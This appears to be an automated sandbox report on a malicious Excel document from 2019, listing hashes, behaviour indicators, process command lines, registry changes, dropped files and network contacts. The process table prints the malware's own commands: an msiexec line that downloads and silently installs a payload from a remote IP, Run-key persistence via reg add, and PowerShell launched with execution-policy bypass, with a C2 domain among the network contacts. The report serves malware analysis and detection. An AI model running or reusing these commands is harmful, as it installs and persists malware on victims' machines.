| File name: | 19d278bfbe851f8d7599e9e682ccc0f77619b905.xls |
| Full analysis: | https://app.any.run/tasks/06020900-ef17-4cdc-b8f2-8d74abdce1e1 |
| Verdict: | Malicious activity |
| Analysis date: | March 21, 2019, 17:13:28 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Thu Mar 21 06:44:15 2019, Security: 0 |
| MD5: | E5140EB52558797DBE9FAAB58C78C493 |
| SHA1: | 19D278BFBE851F8D7599E9E682CCC0F77619B905 |
| SHA256: | 63522E00181E6B8D9AE8BFD51F7DF8F8EBD0F42323E22047269DF9C7A71C9B6D |
| SSDEEP: | 1536:7Kpb8rGYrMPelwhKmFV5xtezEsgrdg8j/4q09wsRnyKinolB0IdludN7VaLyIc+V:7Kpb8rGYrMPelwhKmFV5xtezEsgrdgUI |
MALICIOUS
Uses Microsoft Installer as loader
- EXCEL.EXE (PID: 264)
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 264)
Loads dropped or rewritten executable
- rundll32.exe (PID: 4088)
Application was dropped or rewritten from another process
- nsA080.tmp (PID: 2848)
Executes PowerShell scripts
- cmd.exe (PID: 4020)
Changes the autorun value in the registry
- reg.exe (PID: 560)
Downloads executable files from the Internet
- msiexec.exe (PID: 3768)
Downloads executable files from IP
- msiexec.exe (PID: 3768)
SUSPICIOUS
Drop ExeToMSI Application
- msiexec.exe (PID: 3768)
Executable content was dropped or overwritten
- msiexec.exe (PID: 3768)
- MSI9F57.tmp (PID: 2120)
Starts application with an unusual extension
- MSI9F57.tmp (PID: 2120)
Starts CMD.EXE for commands execution
- nsA080.tmp (PID: 2848)
- rundll32.exe (PID: 4088)
Uses RUNDLL32.EXE to load library
- cmd.exe (PID: 3876)
Creates files in the user directory
- powershell.exe (PID: 2032)
Uses REG.EXE to modify Windows registry
- cmd.exe (PID: 3272)
INFO
Reads Microsoft Office registry keys
- EXCEL.EXE (PID: 264)
Writes to a desktop.ini file (may be used to cloak folders)
- msiexec.exe (PID: 3768)
Starts application with an unusual extension
- msiexec.exe (PID: 3768)
Application was dropped or rewritten from another process
- MSI9F57.tmp (PID: 2120)
Loads dropped or rewritten executable
- MSI9F57.tmp (PID: 2120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xls | | | Microsoft Excel sheet (78.9) |
|---|
EXIF
FlashPix
| Author: | Microsoft Office |
|---|---|
| LastModifiedBy: | 1 |
| Software: | Microsoft Excel |
| CreateDate: | 2018:12:19 10:42:12 |
| ModifyDate: | 2019:03:21 06:44:15 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | Microsoft Corporation |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: |
|
| HeadingPairs: |
|
Total processes
43
Monitored processes
11
Malicious processes
7
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 264 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 560 | reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega" /f | C:\Windows\system32\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1008 | msiexec.exe RETURN=185 /i http://169.239.128.104/alg /q ksw='%TEMP%' | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2032 | powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2120 | "C:\Windows\Installer\MSI9F57.tmp" | C:\Windows\Installer\MSI9F57.tmp | msiexec.exe | ||||||||||||
User: admin Company: hepsu burda Integrity Level: MEDIUM Description: hepsu burda Application Exit code: 0 Version: 1.0.2.1 Modules
| |||||||||||||||
| 2848 | "C:\Users\admin\AppData\Local\Temp\nsvA06F.tmp\nsA080.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Users\admin\AppData\Local\Temp\nsvA06F.tmp\nsA080.tmp | — | MSI9F57.tmp | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3272 | cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /f | C:\Windows\system32\cmd.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3768 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3876 | "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Windows\system32\cmd.exe | — | nsA080.tmp | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 4020 | cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1 | C:\Windows\system32\cmd.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
1 039
Read events
933
Write events
99
Delete events
7
Modification events
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | &"3 |
Value: 2622330008010000010000000000000000000000 | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
| Operation: | write | Name: | MTTT |
Value: 0801000040FB497409E0D40100000000 | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | delete value | Name: | &"3 |
Value: 2622330008010000010000000000000000000000 | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | delete key | Name: | |
Value: | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
| Operation: | delete key | Name: | |
Value: | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (264) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\F9080 |
| Operation: | write | Name: | F9080 |
Value: 04000000080100004E00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0031003900640032003700380062006600620065003800350031006600380064003700350039003900650039006500360038003200630063006300300066003700370036003100390062003900300035002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00010000000000000020B7E87509E0D40180900F0080900F0000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
Executable files
6
Suspicious files
4
Text files
10
Unknown types
4
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A16.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3768 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF7E30257C4D44AD00.TMP | — | |
MD5:— | SHA256:— | |||
| 2032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IK7WO6F0WU6R04SGA89J.temp | — | |
MD5:— | SHA256:— | |||
| 4088 | rundll32.exe | C:\Users\admin\AppData\Local\Temp\enu.ps1 | text | |
MD5:— | SHA256:— | |||
| 2120 | MSI9F57.tmp | C:\Users\admin\AppData\Local\Temp\xmlparse.dll | executable | |
MD5:— | SHA256:— | |||
| 3768 | msiexec.exe | C:\Windows\Installer\MSI9F57.tmp | executable | |
MD5:— | SHA256:— | |||
| 3768 | msiexec.exe | C:\Windows\Installer\MSI9A91.tmp | executable | |
MD5:— | SHA256:— | |||
| 3768 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | |
MD5:— | SHA256:— | |||
| 2120 | MSI9F57.tmp | C:\Users\admin\AppData\Local\Temp\nsvA06F.tmp\System.dll | executable | |
MD5:B0C77267F13B2F87C084FD86EF51CCFC | SHA256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77 | |||
| 3768 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Cookies\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3768 | msiexec.exe | GET | 200 | 169.239.128.104:80 | http://169.239.128.104/alg | ZA | executable | 396 Kb | suspicious |
4088 | rundll32.exe | POST | 200 | 179.43.156.37:80 | http://cdnavupdate.icu/jquery/jquery.php | CH | text | 140 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3768 | msiexec.exe | 169.239.128.104:80 | — | Zappie Host LLC | ZA | suspicious |
4088 | rundll32.exe | 179.43.156.37:80 | cdnavupdate.icu | Private Layer INC | CH | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
cdnavupdate.icu |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3768 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3768 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
1072 | svchost.exe | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
4088 | rundll32.exe | Potentially Bad Traffic | ET INFO HTTP POST Request to Suspicious *.icu domain |
1 ETPRO signatures available at the full report